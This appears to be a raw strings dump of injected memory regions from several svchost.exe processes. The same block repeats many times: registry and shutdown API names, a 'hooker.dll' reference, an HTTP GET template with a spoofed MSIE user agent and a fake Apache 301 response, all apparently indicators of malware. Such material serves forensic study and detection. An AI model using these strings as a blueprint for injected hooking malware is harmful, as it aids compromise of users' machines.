Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_648_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_700_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_824_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
